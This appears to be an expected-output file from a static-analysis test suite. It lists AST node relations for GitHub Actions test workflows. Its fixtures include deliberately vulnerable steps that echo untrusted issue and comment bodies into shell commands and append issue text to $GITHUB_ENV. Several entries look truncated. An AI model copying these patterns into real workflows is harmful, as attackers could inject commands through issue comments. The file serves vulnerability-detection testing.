.github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/multiline2.yml:2:3:2:14 | workflow_run | .github/workflows/multiline2.yml:2:3:5:18 | workflow_run: | +| .github/workflows/multiline2.yml:2:3:5:18 | workflow_run: | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:3:17:3:22 | Prev | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:3:17:3:22 | Prev | .github/workflows/multiline2.yml:2:3:2:14 | workflow_run | +| .github/workflows/multiline2.yml:3:17:3:22 | Prev | .github/workflows/multiline2.yml:2:3:5:18 | workflow_run: | +| .github/workflows/multiline2.yml:5:9:5:17 | completed | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:5:9:5:17 | completed | .github/workflows/multiline2.yml:2:3:2:14 | workflow_run | +| .github/workflows/multiline2.yml:5:9:5:17 | completed | .github/workflows/multiline2.yml:2:3:5:18 | workflow_run: | +| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline2.yml:30:9:34:6 | Run Step | +| .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline2.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline2.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline2.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline2.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline2.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline2.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline2.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline2.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:63:15:63:19 | line1 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:63:15:63:19 | line1 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:63:15:63:19 | line1 | .github/workflows/multiline2.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | .github/workflows/multiline2.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:66:15:66:24 | multiline1 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:66:15:66:24 | multiline1 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:66:15:66:24 | multiline1 | .github/workflows/multiline2.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:30:9:34:6 | Run Step | +| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:63:15:63:19 | line1 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:63:15:63:19 | line1 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:63:15:63:19 | line1 | .github/workflows/multiline.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | .github/workflows/multiline.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:66:15:66:24 | multiline1 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:66:15:66:24 | multiline1 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:66:15:66:24 | multiline1 | .github/workflows/multiline.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/multiline.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:71:15:71:21 | block11 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:71:15:71:21 | block11 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:71:15:71:21 | block11 | .github/workflows/multiline.yml:71:9:78:6 | Run Step | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | 